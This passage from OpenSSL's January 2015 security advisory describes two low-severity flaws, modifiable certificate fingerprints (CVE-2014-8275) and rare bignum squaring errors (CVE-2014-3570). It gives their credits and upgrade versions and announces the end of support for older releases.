Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.

Certificate fingerprints can be modified (CVE-2014-8275)
========================================================

Severity: Low

OpenSSL accepts several non-DER-variations of certificate signature
algorithm and signature encodings. OpenSSL also does not enforce a match
between the signature algorithm between the signed and unsigned portions of
the certificate. By modifying the contents of the signature algorithm or the
encoding of the signature, it is possible to change the certificate's
fingerprint.

This does not allow an attacker to forge certificates, and does not affect
certificate verification or OpenSSL servers/clients in any other way. It
also does not affect common revocation mechanisms. Only custom applications
that rely on the uniqueness of the fingerprint (e.g. certificate blacklists)
may be affected.

This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

One variant of this issue was discovered by Antti Karjalainen and Tuomo
Untinen from the Codenomicon CROSS program and reported to OpenSSL on 1st
December 2014 by NCSC-FI Vulnerability Co-ordination. Another variant was
independently reported to OpenSSL on 12th December 2014 by Konrad Kraszewski
from Google.
Further analysis was conducted and fixes were developed by Stephen Henson of
the OpenSSL core team.

Bignum squaring may produce incorrect results (CVE-2014-3570)
=============================================================

Severity: Low

Bignum squaring (BN_sqr) may produce incorrect results on some platforms,
including x86_64. This bug occurs at random with a very low probability, and
is not known to be exploitable in any way, though its exact impact is
difficult to determine. The following has been determined:

*) The probability of BN_sqr producing an incorrect result at random is very
   low: 1/2^64 on the single affected 32-bit platform (MIPS) and 1/2^128 on
   affected 64-bit platforms.

*) On most platforms, RSA follows a different code path and RSA operations
   are not affected at all. For the remaining platforms (e.g. OpenSSL built
   without assembly support), pre-existing countermeasures thwart bug
   attacks [1].

*) Static ECDH is theoretically affected: it is possible to construct
   elliptic curve points that would falsely appear to be on the given curve.
   However, there is no known computationally feasible way to construct such
   points with low order, and so the security of static ECDH private keys is
   believed to be unaffected.

*) Other routines known to be theoretically affected are modular
   exponentiation, primality testing, DSA, RSA blinding, JPAKE and SRP. No
   exploits are known and straightforward bug attacks fail - either the
   attacker cannot control when the bug triggers, or no private key material
   is involved.

This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

This issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille
(Blockstream) who also suggested an initial fix. Further analysis was
conducted by the OpenSSL development team and Adam Langley of Google.
The final fix was developed by Andy Polyakov of the OpenSSL core team.

[1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf

Note
====

As per our previous announcements and our Release Strategy
(https://www.openssl.org/about/releasestrat.html), support for OpenSSL
versions 1.0.0 and 0.9.8 will cease on 31st December 2015. No security
updates for these releases will be provided after that date. Users of these
releases are advised to upgrade.

References
==========

URL for this Security Advisory:
https://www.openssl.org/news/secadv_20150108.txt

Note: the online version of the advisory may be updated with additional
details over time.

For details of OpenSSL severity classifications please see:
https://www.openssl.org/about/secpolicy.html

Sursa: https://www.openssl.org/news/secadv_20150108.txt